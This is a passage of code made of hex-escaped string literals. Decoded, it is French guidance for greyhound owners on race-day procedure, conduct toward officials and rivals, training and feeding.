+"\x72\x73\x20\x70\x6f\x75\x72\x20\x64\xe9\x74\x65\x63\x74\x65\x72" +"\x20\x64\x65\x73\x20\x62\x6c\x65\x73\x73\x75\x72\x65\x73\x2e\x20" +"\x44\x61\x6e\x73\x20\x6c\x65\x75\x72\x20\x69\x6e\x74\xe9\x72\xea" +"\x74\x2c\x20\x69\x6c\x20\x70\x65\x75\x74\x20\x69\x6e\x74\x65\x72" +"\x64\x69\x72\x65\x20\x6c\x65\x20\x64\xe9\x70\x61\x72\x74\x2e\x0d" +"\x4f\x6e\x20\x76\x6f\x75\x73\x20\x72\x65\x6d\x65\x74\x20\x6c\x65" +"\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x65\x20\x64\x65\x20\x6c\x61" +"\x20\x6a\x6f\x75\x72\x6e\xe9\x65\x2c\x20\x6d\x61\x69\x73\x20\x69" +"\x6c\x20\x79\x20\x61\xc0\x72\x61\x20\x73\x6f\x75\x76\x65\x6e\x74" +"\x20\x64\x65\x73\x20\x6d\x6f\x64\x69\x66\x69\x63\x61\x74\x69\x6f" +"\x6e\x73\x2e\x20\x45\x63\x6f\x75\x74\x65\x7a\x20\x62\x69\x65\x6e" +"\x20\x6c\x65\x73\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e" +"\x73\x20\x64\x69\x66\x66\x75\x73\xe9\x65\x73\x20\x70\x61\x72\x20" +"\x6c\x61\x20\x73\x6f\x6e\x6f\x20\x65\x74\x20\x73\x75\x69\x76\x65" +"\x7a\x20\x63\x65\x20\x71\x75\x27\x69\x6c\x20\x79\x20\x61\x20\x61" +"\x75\x20\x74\x61\x62\x6c\x65\x61\x75\x20\x64\x27\x61\x66\x66\x69" +"\x63\x68\x61\x67\x65\x2e\x0d\x0d\x41\x76\x61\x6e\x74\x20\x63\x68" +"\x61\x71\x75\x65\x20\x63\x6f\x75\x72\x73\x65\x20\x6f\xf9\x20\x76" +"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x65\x73\x74" +"\x20\x69\x6e\x73\x63\x72\x69\x74\x2c\x20\x76\x6f\x75\x73\x20\x6c" 
+"\x27\x61\x6d\x65\x6e\x65\x7a\x20\x61\x75\x20\x63\x6f\x6e\x74\x72" +"\xf4\x6c\x65\x20\x64\x65\x20\x64\xe9\x70\x61\x72\x74\x20\x6d\x75" +"\x6e\x69\x20\x64\x65\x20\x73\x61\x20\x63\x61\x73\x61\x71\x75\x65" +"\x20\x28\x6c\x65\x20\x6e\x75\x6d\xe9\x72\x6f\x20\x65\x73\x74\x20" +"\x61\x75\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x65\x29\x20\x65\x74" +"\x20\x64\x65\x20\x73\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8\x72\x65" +"\x2e\x20\x4c\xe0\x2c\x20\x76\x6f\x75\x73\x20\x74\x69\x72\x65\x7a" +"\x20\x61\x75\x20\x73\x6f\x72\x74\x20\x6c\x61\x20\x63\x61\x73\x65" +"\x20\x64\x61\x6e\x73\x20\x6c\x61\x71\x75\x65\x6c\x6c\x65\x20\x76" +"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x73\x65\x72" +"\x61\x20\x70\x6c\x61\x63\xe9\x20\x61\x75\x20\x64\xe9\x70\x61\x72" +"\x74\x2e\x0d\x0d\x41\x20\x6c\x27\x61\x70\x70\x65\x6c\x20\x64\x75" +"\x20\x73\x74\x61\x72\x74\x65\x72\x20\x28\x6c\xe9\x76\x72\x69\x65" +"\x72\x73\x20\x61\x75\x20\x64\xe9\x70\x61\x72\x74\x20\x64\x65\x20" +"\x6c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x6e\xb0\x78\x29\x20\x76" +"\x6f\x75\x73\x20\x61\x6c\x6c\x65\x7a\x20\x64\x61\x6e\x73\x20\x6c" +"\x27\x6f\x72\x64\x72\x65\x20\x64\x65\x73\x20\x63\x61\x73\x65\x73" +"\x2c\x20\x63\x68\x61\x63\x75\x6e\x20\x73\x65\x20\x6d\x65\x74\x20" +"\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x61\x20\x73\x69\x65\x6e" +"\x6e\x65\x2c\x20\x65\x74\x20\xe0\x20\x6c\x27\x6f\x72\x64\x72\x65" +"\x20\x64\x75\x20\x73\x74\x61\x72\x74\x65\x72\x20\x28\x65\x6e\x20" +"\x62\x6f\x69\x74\x65\x29\x20\x76\x6f\x75\x73\x20\x6c\x27\x69\x6e" +"\x74\x72\x6f\x64\x75\x69\x72\x65\x7a\x20\x65\x6e\x20\x66\x65\x72" +"\x6d\x61\x6e\x74\x20\x62\x69\x65\x6e\x20\x6c\x61\x20\x70\x6f\x72" +"\x74\x65\x20\x64\x65\x72\x72\x69\xe8\x72\x65\x20\x6c\x75\x69\x20" +"\x73\x61\x6e\x73\x20\x72\x61\x6c\x65\x6e\x74\x69\x72\x20\x6c\x61" +"\x20\x6d\x69\x73\x65\x20\x65\x6e\x20\x62\x6f\x69\x74\x65\x2e\x0d" +"\x4c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x65\x73\x74\x20\x70\x61" +"\x72\x74\x69\x65\x2c\x20\x76\x6f\x75\x73\x20\x6e\x65\x20\x64\x65" 
+"\x76\x65\x7a\x20\x70\x61\x73\x20\x63\x72\x69\x65\x72\x20\x61\x70" +"\x72\xe8\x73\x20\x6c\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x61" +"\x75\x20\x72\x69\x73\x71\x75\x65\x20\x64\x65\x20\x6c\x65\x20\x66" +"\x61\x69\x72\x65\x20\x72\x65\x76\x65\x6e\x69\x72\x20\x76\x65\x72" +"\x73\x20\x76\x6f\x75\x73\x2e\x20\x56\x6f\x75\x73\x20\x6e\x65\x20" +"\x64\x65\x76\x65\x7a\x20\x70\x61\x73\x20\x6c\x27\x65\x78\x63\x69" +"\x74\x65\x72\x20\x70\x61\x72\x20\x75\x6e\x20\x6d\x6f\x79\x65\x6e" +"\x20\x71\x75\x65\x6c\x63\x6f\x6e\x71\x75\x65\x2e\x20\x20\x56\x6f" +"\x75\x73\x20\x76\x6f\x75\x73\x20\x72\x61\x70\x70\x72\x6f\x63\x68" +"\x65\x7a\x20\x64\x65\x20\x6c\x61\x20\x7a\x6f\x6e\x65\x20\x64\x27" +"\x61\x72\x72\x69\x76\xe9\x65\x20\x64\x75\x20\x6c\x65\x75\x72\x72" +"\x65\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x72\xe9\x63\x75\x70\xe9" +"\x72\x65\x72\x20\x64\xe8\x73\x20\x6c\x27\x61\x72\x72\x69\x76\xe9" +"\x65\x2e\x0d\x0d\x41\x70\x72\xe8\x73\x20\x6c\x27\x61\x76\x6f\x69" +"\x72\x20\x72\xe9\x63\x75\x70\xe9\x72\xe9\x2c\x20\x76\x6f\x75\x73" +"\x20\xf4\x74\x65\x7a\x20\x6c\x61\x20\x6d\x75\x73\x65\x6c\x69\xe8" +"\x72\x65\x20\x65\x74\x20\x76\x6f\x75\x73\x20\x6c\x65\x20\x72\x61" +"\x6d\x65\x6e\x65\x7a\x20\x61\x75\x20\x72\x65\x70\x6f\x73\x2c\x20" +"\x20\x64\x65\x20\x70\x72\xe9\x66\xe9\x72\x65\x6e\x63\x65\x20\x65" +"\x6e\x20\x6c\x65\x20\x66\x61\x69\x73\x61\x6e\x74\x20\x75\x6e\x20" +"\x70\x65\x75\x20\x6d\x61\x72\x63\x68\x65\x72\x20\x70\x6f\x75\x72" +"\x20\x6c\x65\x20\x64\xe9\x74\x65\x6e\x64\x72\x65\x2e\x0d\x4c\x65" +"\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x20\x73\x65\x72\x61\x20\x61" +"\x66\x66\x69\x63\x68\xe9\x2e\x0d\x0d\x45\x6e\x20\x50\x2e\x56\x2e" +"\x4c\x2e\x20\x76\x6f\x75\x73\x20\x6e\x65\x20\x64\x65\x76\x65\x7a" +"\x20\x70\x61\x73\x20\x6c\x61\x69\x73\x73\x65\x72\x20\x6c\x65\x20" +"\x4c\xe9\x76\x72\x69\x65\x72\x20\x76\x6f\x69\x72\x20\x6c\x65\x20" +"\x70\x61\x72\x63\x6f\x75\x72\x73\x2c\x20\x63\x61\x72\x20\x69\x6c" +"\x20\x70\x6f\x75\x72\x72\x61\x69\x74\x20\x63\x6f\x75\x70\x65\x72" 
+"\x20\x65\x74\x20\xea\x74\x72\x65\x20\x70\xe9\x6e\x61\x6c\x69\x73" +"\xe9\x2e\x0d\x0d\x53\x27\x69\x6c\x20\x79\x20\x61\x20\x65\x75\x20" +"\x64\x65\x73\x20\x69\x6e\x63\x69\x64\x65\x6e\x74\x73\x2c\x20\x67" +"\x61\x72\x64\x65\x7a\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x6c\x6d" +"\x65\x2e\x20\x4c\x61\x20\x63\x6f\x75\x72\x73\x65\x20\x65\x73\x74" +"\x20\x75\x6e\x20\x73\x70\x6f\x72\x74\x20\x70\x6c\x65\x69\x6e\x20" +"\x64\x27\x61\x6c\xe9\x61\x73\x20\x65\x74\x20\x6c\x65\x73\x20\x4c" +"\xe9\x76\x72\x69\x65\x72\x73\x20\x6f\x6e\x74\x20\x70\x61\x72\x66" +"\x6f\x69\x73\x20\x75\x6e\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d" +"\x65\x6e\x74\x20\x74\x72\xe8\x73\x20\x64\xe9\x63\x65\x76\x61\x6e" +"\x74\x2e\x20\x4e\x27\x61\x67\x72\x65\x73\x73\x65\x7a\x20\x70\x61" +"\x73\x20\x6c\x65\x20\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72" +"\x65\x20\x64\x27\x75\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x71" +"\x75\x69\x20\x61\x20\x67\xea\x6e\xe9\x20\x6c\x65\x20\x76\xf4\x74" +"\x72\x65\x2e\x20\x49\x6c\x20\x6e\xf9\x79\x20\x65\x73\x74\x20\x70" +"\x6f\x75\x72\x20\x72\x69\x65\x6e\x20\x65\x74\x20\x65\x73\x74\x20" +"\x64\xe9\x6a\xe0\x20\x61\x73\x73\x65\x7a\x20\x6d\x61\x6c\x68\x65" +"\x75\x72\x65\x75\x78\x20\x64\x27\xea\x74\x72\x65\x20\x64\x69\x73" +"\x71\x75\x61\x6c\x69\x66\x69\xe9\x2e\x20\x4e\x65\x20\x76\x6f\x75" +"\x73\x20\x65\x6e\x20\x70\x72\x65\x6e\x65\x7a\x20\x70\x61\x73\x20" +"\x61\x75\x78\x20\x6f\x62\x73\x65\x72\x76\x61\x74\x65\x75\x72\x73" +"\x20\x6e\x69\x20\x61\x75\x20\x6a\x75\x67\x65\x20\x73\x69\x20\x76" +"\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\x65\x73\x74" +"\x20\x73\x61\x6e\x63\x74\x69\x6f\x6e\x6e\xe9\x20\x73\x61\x6e\x73" +"\x20\x71\x75\x65\x20\x76\x6f\x75\x73\x20\x61\x79\x69\x65\x7a\x20" +"\x76\x75\x20\x71\x75\x65\x6c\x71\x75\x65\x20\x63\x68\x6f\x73\x65" +"\x2c\x20\x6f\x75\x20\x70\x61\x72\x63\x65\x20\x71\x75\x65\x20\x76" +"\x6f\x75\x73\x20\x69\x6e\x63\x72\x69\x6d\x69\x6e\x65\x7a\x20\x75" +"\x6e\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x0d\x56\x6f" 
+"\x75\x73\x20\x61\x76\x65\x7a\x20\x61\x66\x66\x61\x69\x72\x65\x20" +"\xe0\x20\x64\x65\x73\x20\x62\xe9\x6e\xe9\x76\x6f\x6c\x65\x73\x20" +"\x65\x78\x70\xe9\x72\x69\x6d\x65\x6e\x74\xe9\x73\x2c\x20\x64\x6f" +"\x6e\x74\x20\x6c\x65\x73\x20\x64\xe9\x63\x69\x73\x69\x6f\x6e\x73" +"\x20\x73\x6f\x6e\x74\x2c\x20\x65\x6e\x20\x6f\x75\x74\x72\x65\x2c" +"\x20\x63\x6f\x6e\x74\x72\xf4\x6c\xe9\x65\x73\x20\x70\x61\x72\x20" +"\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9" +"\x76\x72\x69\x65\x72\x73\x2e\x20\x43\x65\x20\x71\x75\x27\x69\x6c" +"\x73\x20\x20\x6f\x6e\x74\x20\x76\x75\x20\xe0\x20\x31\x35\x30\x20" +"\x6d\xe8\x74\x72\x65\x73\x20\x64\x65\x20\x76\x6f\x75\x73\x2c\x20" +"\xe0\x20\x35\x30\x20\x4b\x6d\x2f\x68\x2c\x20\x70\x65\x75\x74\x20" +"\x6e\x27\x61\x76\x6f\x69\x72\x20\x64\x75\x72\xe9\x20\x71\x75\x65" +"\x20\x31\x20\x6f\x75\x20\x32\x20\x64\x69\x78\x69\xe8\x6d\x65\x73" +"\x20\x64\x65\x20\x73\x65\x63\x6f\x6e\x64\x65\x20\x28\x32\x6d\x29" +"\x2e\x20\x52\x61\x70\x70\x65\x6c\x65\x7a\x2d\x76\x6f\x75\x73\x20" +"\x71\x75\x65\x20\x76\x6f\x74\x72\x65\x20\x4c\xe9\x76\x72\x69\x65" +"\x72\x20\x73\x65\x6e\x74\x20\x76\x6f\x74\x72\x65\x20\x63\x61\x6c" +"\x6d\x65\x20\x6f\x75\x20\x76\x6f\x74\x72\x65\x20\xe9\x6e\x65\x72" +"\x76\x65\x6d\x65\x6e\x74\x2c\x20\x71\x75\x65\x20\x73\x65\x73\x20" +"\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x74\x20\x73\x6f\x6e" +"\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e\x74\x20\x73\x27" +"\x65\x6e\x20\x72\x65\x73\x73\x65\x6e\x74\x65\x6e\x74\x2e\x0d\x4c" +"\x61\x20\x6d\x65\x69\x6c\x6c\x65\x75\x72\x65\x20\x66\x61\xe7\x6f" +"\x6e\x20\x64\x65\x20\x70\x65\x72\x64\x72\x65\x20\x65\x73\x74\x20" +"\x64\x27\x61\x62\x6f\x72\x64\x20\x64\x65\x20\x73\x65\x20\x63\x6f" +"\x6d\x70\x6f\x72\x74\x65\x72\x20\x65\x6e\x20\x6d\x61\x75\x76\x61" +"\x69\x73\x20\x70\x65\x72\x64\x61\x6e\x74\x2e\x0d\x53\x69\x20\x76" +"\x6f\x75\x73\x20\x6e\x65\x20\x70\x61\x72\x76\x65\x6e\x65\x7a\x20" +"\x70\x61\x73\x20\xe0\x20\x76\x6f\x75\x73\x20\x63\x6f\x6e\x74\x72" 
+"\xf4\x6c\x65\x72\x2c\x20\x61\x62\x61\x6e\x64\x6f\x6e\x6e\x65\x7a" +"\x20\x6c\x65\x20\x73\x70\x6f\x72\x74\x20\x6c\xe9\x76\x72\x69\x65" +"\x72\x2e\x0d\x53\x69\x20\x76\x6f\x75\x73\x20\x61\x76\x65\x7a\x20" +"\x75\x6e\x65\x20\x6f\x62\x73\x65\x72\x76\x61\x74\x69\x6f\x6e\x20" +"\xe0\x20\x66\x61\x69\x72\x65\x2c\x20\x61\x64\x72\x65\x73\x73\x65" +"\x7a\x2d\x76\x6f\x75\x73\x20\x61\x75\x20\x63\x68\x65\x66\x20\x64" +"\x65\x20\x70\x69\x73\x74\x65\x2c\x20\x73\x65\x75\x6c\x65\x20\x70" +"\x65\x72\x73\x6f\x6e\x6e\x65\x20\x61\x75\x74\x6f\x72\x69\x73\xe9" +"\x65\x20\xe0\x20\x74\x72\x61\x6e\x73\x6d\x65\x74\x74\x72\x65\x20" +"\x6c\x65\x73\x20\x69\x6e\x66\x6f\x72\x6d\x61\x74\x69\x6f\x6e\x73" +"\x2e\x0d\x0d\x41\x20\x6c\x27\x69\x73\x73\x75\x65\x20\x64\x65\x20" +"\x6c\x61\x20\x72\xe9\x75\x6e\x69\x6f\x6e\x20\x6f\x6e\x20\x76\x6f" +"\x75\x73\x20\x72\x65\x6d\x65\x74\x74\x72\x61\x20\x76\x6f\x74\x72" +"\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x64\xfb\x6d\x65\x6e\x74\x20" +"\x72\x65\x6d\x70\x6c\x69\x2c\x20\x76\x6f\x73\x20\x70\x72\x69\x78" +"\x2e\x20\x43\x6f\x6e\x74\x72\xf4\x6c\x65\x7a\x20\x62\x69\x65\x6e" +"\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x63\x61\x72\x20\x69" +"\x6c\x20\x70\x65\x75\x74\x20\x79\x20\x61\x76\x6f\x69\x72\x20\x65" +"\x75\x20\x64\x65\x73\x20\x65\x72\x72\x65\x75\x72\x73\x20\x64\x65" +"\x20\x74\x72\x61\x6e\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x71" +"\x75\x27\x69\x6c\x20\x73\x65\x72\x61\x20\x64\x69\x66\x66\x69\x63" +"\x69\x6c\x65\x20\x64\x65\x20\x63\x6f\x72\x72\x69\x67\x65\x72\x20" +"\x65\x6e\x73\x75\x69\x74\x65\x2e\x0d\x53\x6f\x79\x65\x7a\x20\x70" +"\x61\x74\x69\x65\x6e\x74\x20\x3a\x20\x4c\x65\x20\x73\x65\x63\x72" +"\xe9\x74\x61\x72\x69\x61\x74\x20\x61\x75\x72\x61\x20\x63\x6f\x6e" +"\x73\x61\x63\x72\xe9\x20\x6c\x61\x20\x70\x61\x75\x73\x65\x20\x64" +"\x75\x20\x64\xe9\x6a\x65\x75\x6e\x65\x72\x20\xe0\x20\x70\x72\xe9" +"\x2d\x72\x65\x6d\x70\x6c\x69\x72\x20\x6c\x65\x73\x20\x63\x61\x72" +"\x6e\x65\x74\x73\x2c\x20\x6d\x61\x69\x73\x20\x6c\x61\x69\x73\x73" 
+"\x65\x7a\x20\x61\x75\x20\x6a\x75\x67\x65\x20\x6c\x65\x20\x74\x65" +"\x6d\x70\x73\x20\x64\x27\x69\x6e\x73\x63\x72\x69\x72\x65\x20\x6c" +"\x65\x20\x63\x6c\x61\x73\x73\x65\x6d\x65\x6e\x74\x20\x65\x74\x20" +"\x64\x65\x20\x73\x69\x67\x6e\x65\x72\x2e\x20\x56\x6f\x75\x73\x20" +"\x61\x76\x65\x7a\x20\x70\x65\x75\x74\x2d\xea\x74\x72\x65\x20\x75" +"\x6e\x65\x20\x6c\x6f\x6e\x67\x75\x65\x20\x64\x69\x73\x74\x61\x6e" +"\x63\x65\x20\xe0\x20\x70\x61\x72\x63\x6f\x75\x72\x69\x72\x20\x70" +"\x6f\x75\x72\x20\x72\x65\x6e\x74\x72\x65\x72\x20\x63\x68\x65\x7a" +"\x20\x76\x6f\x75\x73\x2c\x20\x6d\x61\x69\x73\x20\x6f\x6e\x20\x6e" +"\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x20\x76\x6f\x75\x73\x20" +"\x72\x65\x6e\x64\x72\x65\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74" +"\x20\x6d\xea\x6d\x65\x20\x73\x69\x20\x76\x6f\x74\x72\x65\x20\x63" +"\x68\x69\x65\x6e\x20\x61\x20\xe9\x74\xe9\x20\x70\x72\xe9\x6d\x61" +"\x74\x75\x72\xe9\x6d\x65\x6e\x74\x20\xe9\x6c\x69\x6d\x69\x6e\xe9" +"\x2e\x20\x56\x6f\x75\x73\x20\x70\x6f\x75\x76\x65\x7a\x20\x74\x6f" +"\x75\x6a\x6f\x75\x72\x73\x20\x64\x65\x6d\x61\x6e\x64\x65\x72\x20" +"\xe0\x20\x75\x6e\x20\x61\x6d\x69\x20\x64\x65\x20\x72\xe9\x63\x75" +"\x70\xe9\x72\x65\x72\x20\x6c\x65\x20\x63\x61\x72\x6e\x65\x74\x20" +"\xe0\x20\x76\x6f\x74\x72\x65\x20\x70\x6c\x61\x63\x65\x20\x73\x69" +"\x20\x76\x6f\x75\x73\x20\x74\x65\x6e\x65\x7a\x20\xe0\x20\x70\x61" +"\x72\x74\x69\x72\x20\x74\xf4\x74\x2e\x0d\x0d\x45\x6e\x74\x72\x65" +"\x74\x69\x65\x6e\x20\x3a\x0d\x4c\x65\x73\x20\x70\x72\x6f\x62\x6c" +"\xe8\x6d\x65\x73\x20\x64\x65\x20\x6c\x27\x65\x6e\x74\x72\x61\xee" +"\x6e\x65\x6d\x65\x6e\x74\x2c\x20\x64\x65\x20\x6c\x27\x61\x6c\x69" +"\x6d\x65\x6e\x74\x61\x74\x69\x6f\x6e\x2c\x20\x64\x65\x73\x20\x73" +"\x6f\x69\x6e\x73\x20\x73\x6f\x75\x6c\xe8\x76\x65\x6e\x74\x20\x62" +"\x65\x61\x75\x63\x6f\x75\x70\x20\x64\x65\x20\x63\x6f\x6e\x74\x72" +"\x6f\x76\x65\x72\x73\x65\x73\x2c\x20\x63\x68\x61\x63\x75\x6e\x20" +"\x61\x79\x61\x6e\x74\x20\x73\x61\x20\x72\x65\x63\x65\x74\x74\x65" 
+"\x2c\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x73\x61\x20\x74\x68\xe9" +"\x6f\x72\x69\x65\x2e\x0d\x0d\x45\x6e\x74\x72\x61\xee\x6e\x65\x6d" +"\x65\x6e\x74\x20\x3a\x0d\x54\x6f\x75\x74\x20\x65\x6e\x74\x72\x61" +"\xee\x6e\x65\x6d\x65\x6e\x74\x20\x63\x6f\x6d\x70\x72\x65\x6e\x64" +"\x20\x75\x6e\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x68\x69\x76\x65" +"\x72\x6e\x61\x6c\x20\x64\x65\x20\x66\x6f\x6e\x64\x2c\x20\x64\x65" +"\x73\x20\x70\x68\x61\x73\x65\x73\x20\x64\x65\x20\x74\x72\x61\x76" +"\x61\x69\x6c\x20\x6d\x6f\x64\xe9\x72\xe9\x20\x28\x6d\x61\x72\x63" +"\x68\x65\x2c\x20\x74\x72\x6f\x74\x29\x2c\x20\x64\x65\x73\x20\x70" +"\x68\x61\x73\x65\x73\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65" +"\x20\x28\x6c\x65\x75\x72\x72\x65\x2c\x20\x62\x61\x6c\x6c\x65\x2c" +"\x20\x73\x70\x72\x69\x6e\x74\x2c\x20\x65\x74\x63\x2e\x2e\x2e\x29" +"\x2e\x20\x4c\x65\x20\x64\x6f\x73\x61\x67\x65\x20\x76\x61\x72\x69" +"\x65\x20\x73\x65\x6c\x6f\x6e\x20\x6c\x61\x20\x72\x61\x63\x65\x20" +"\x28\x6c\x65\x20\x67\x72\x65\x79\x68\x6f\x75\x6e\x64\x2c\x20\x70" +"\x6c\x75\x73\x20\x72\x61\x70\x69\x64\x65\x2c\x20\x65\x73\x74\x20" +"\x6d\x6f\x69\x6e\x73\x20\x72\xe9\x73\x69\x73\x74\x61\x6e\x74\x20" +"\x71\x75\x65\x20\x6c\x65\x73\x20\x61\x75\x74\x72\x65\x73\x29\x2c" +"\x20\x6c\x27\xe9\x70\x6f\x71\x75\x65\x2c\x20\x6c\x27\x69\x6e\x64" +"\x69\x76\x69\x64\x75\x2e\x0d\x43\x65\x72\x74\x61\x69\x6e\x73\x20" +"\x6f\x6e\x74\x20\x62\x65\x73\x6f\x69\x6e\x20\x64\x65\x20\x62\x65" +"\x61\x75\x63\x6f\x75\x70\x20\x64\x27\x65\x6e\x74\x72\x61\xee\x6e" +"\x65\x6d\x65\x6e\x74\x2c\x20\x64\x27\x61\x75\x74\x72\x65\x73\x20" +"\x70\x65\x75\x2c\x20\x6d\x61\x69\x73\x20\x69\x6c\x20\x6e\x27\x79" +"\x20\x61\x20\x67\x75\xe8\x72\x65\x20\x64\x65\x20\x62\x6f\x6e\x73" +"\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x73\x61\x6e\x73\x20" +"\x65\x66\x66\x6f\x72\x74\x73\x20\x64\x75\x20\x70\x72\x6f\x70\x72" +"\x69\xe9\x74\x61\x69\x72\x65\x2e\x0d\x49\x6c\x20\x66\x61\x75\x74" +"\x20\x64\x75\x20\x74\x65\x6d\x70\x73\x2c\x20\x61\x75\x20\x6d\x6f" 
+"\x69\x6e\x73\x20\x74\x72\x6f\x69\x73\x20\x73\x65\x6d\x61\x69\x6e" +"\x65\x73\x2c\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x70\x6c\x75\x73" +"\x69\x65\x75\x72\x73\x20\x6d\x6f\x69\x73\x20\x70\x6f\x75\x72\x20" +"\x6d\x65\x74\x74\x72\x65\x20\x75\x6e\x20\x6c\xe9\x76\x72\x69\x65" +"\x91\x20\x65\x6e\x20\x66\x6f\x72\x6d\x65\x2e\x20\x4c\x65\x73\x20" +"\x72\x69\x73\x71\x75\x65\x50\x20\x64\x65\x20\x62\x6c\x65\x73\x73" +"\x75\x72\x65\x73\x20\x73\x6f\x6e\x74\x20\xe9\x6c\x65\x76\xe9\x73" +"\x20\x65\x6e\x20\x63\x61\x73\x20\x64\x65\x20\x6d\xe9\x66\x6f\x72" +"\x6d\x65\x20\x6f\x75\x20\x64\x65\x20\x73\x75\x70\x65\x72\x20\x63" +"\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x2e\x0d\x42\x65\x61\x75\x63\x6f" +"\x75\x70\x20\x28\x6d\x61\x69\x73\x20\x70\x61\x73\x20\x74\x6f\x75" +"\x74\x65\x73\x29\x20\x20\x64\x65\x20\x66\x65\x6d\x65\x6c\x6c\x65" +"\x73\x20\x61\x6d\xe9\x6c\x69\x6f\x72\x65\x6e\x74\x20\x6c\x65\x75" +"\x72\x20\x76\x69\x74\x65\x73\x73\x65\x20\x61\x76\x61\x6e\x74\x20" +"\x6c\x65\x73\xd8\x63\x68\x61\x6c\x65\x75\x72\x73\x2c\x20\x65\x74" +"\x20\x62\x61\x69\x73\x73\x65\x6e\x74\x20\x64\x65\x20\x66\x6f\x72" +"\x6d\x65\x20\x70\x65\x6e\x64\x61\x6e\x74\x20\x71\x75\x61\x74\x72" +"\x65\x20\xe0\x20\x68\x75\x69\x74\x20\x73\x65\x6d\x61\x69\x6e\x65" +"\x73\x20\x61\x70\x72\xe8\x73\x20\x6c\x65\x20\x6d\x69\x6c\x69\x65" +"\x75\x20\x64\x65\x73\x20\x63\x68\x61\x6c\x65\x75\x72\x73\x2e\x20" +"\x4c\x61\x20\x76\x69\x74\x65\x73\x73\x65\x20\x6d\x61\x78\x69\x6d" +"\x75\x6d\x20\x65\x73\x74\x20\x61\x4a\x74\x65\x69\x6e\x74\x65\x20" +"\x76\x65\x72\x73\x20\x31\x32\x20\x2d\x20\x31\x35\x20\x6d\x6f\x69" +"\x73\x2c\x20\x6d\x61\x69\x73\x20\x61\x76\x65\x63\x20\x6c\x65\x20" +"\x6d\xe9\x74\x69\x65\x72\x2c\x20\x6c\x65\x73\x20\x6d\x65\x69\x6c" +"\x6c\x65\x75\x72\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20" +"\x73\x6f\x6e\x74\x20\x64\x65\x20\x32\x20\xe0\x20\x35\x20\x61\x6e" +"\x73\x2e\x20\x0d\x50\x61\x73\x73\xe9\x20\x73\x69\x78\x20\x61\x6e" +"\x73\x2c\x20\x6c\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x62\x61" 
+"\x69\x73\x73\x65\x2e\x0d\x0d\x0d\x0d\x0d\x41\x6c\x69\x6d\x65\x6e" +"\x74\x61\x74\x69\x6f\x6e\x20\x3a\x0d\x0d\x45\x6c\x6c\x65\x20\x70" +"\x65\x75\x74\x20\xea\x74\x72\x65\x20\x74\x72\x61\x64\x69\x74\x69" +"\x6f\x6e\x6e\x65\x6c\x6c\x65\x2c\x20\x73\x61\x6e\x73\x20\x74\x72" +"\x6f\x70\x20\x64\x65\x20\x6c\xe9\x67\x75\x6d\x65\x73\x20\x6f\x75" +"\x20\x64\x65\x20\x66\xe9\x63\x75\x6c\x65\x6e\x74\x73\x2c\x20\x6f" +"\x75\x20\xe0\x20\x62\x61\x73\x65\x20\x64\x27\x61\x6c\x69\x6d\x65" +"\x6e\x74\x73\x20\x64\x75\x20\x63\x6f\x6d\x6d\x65\x72\x63\x65\x2e" +"\x20\x49\x6c\x20\x76\x61\x75\x74\x20\x6d\x69\x65\x75\x78\x20\x64" +"\x65\x75\x78\x20\x6f\x75\x20\x74\x72\x6f\x69\x73\x20\x72\x65\x70" +"\x61\x73\x20\x70\x61\x72\x20\x6a\x6f\x75\x72\x20\x71\x75\x27\x75" +"\x6e\x20\x73\x65\x75\x6c\x2e\x20\x41\x74\x74\x65\x6e\x74\x69\x6f" +"\x6e\x20\x61\x75\x78\x20\x65\x78\x63\xe8\x73\x20\x64\x65\x20\x63" +"\x61\x6c\x63\x69\x75\x6d\x2c\x20\x64\x65\x20\x70\x68\x6f\x73\x70" +"\x68\x6f\x72\x65\x2c\x20\x64\x65\x20\x76\x69\x74\x61\x6d\x69\x6e" +"\x65\x73\x20\x44\x2e\x20\x4e\x65\x20\x64\x6f\x6e\x6e\x65\x7a\x20" +"\x70\x61\x73\x20\x75\x6e\x20\x72\x65\x70\x61\x73\x20\x63\x6f\x6d" +"\x70\x6c\x65\x74\x20\x6c\x65\x20\x6a\x6f\x75\x72\x20\x64\x65\x73" +"\x20\x63\x6f\x75\x72\x73\x65\x73\x2e\x0d\x46\x61\x69\x74\x65\x73" +"\x20\x62\x6f\x69\x72\x65\x20\x6d\x6f\x64\xe9\x72\xe9\x6d\x65\x6e" +"\x74\x2c\x20\x64\x65\x20\x6c\x27\x65\x61\x75\x20\x6e\x6f\x6e\x20" 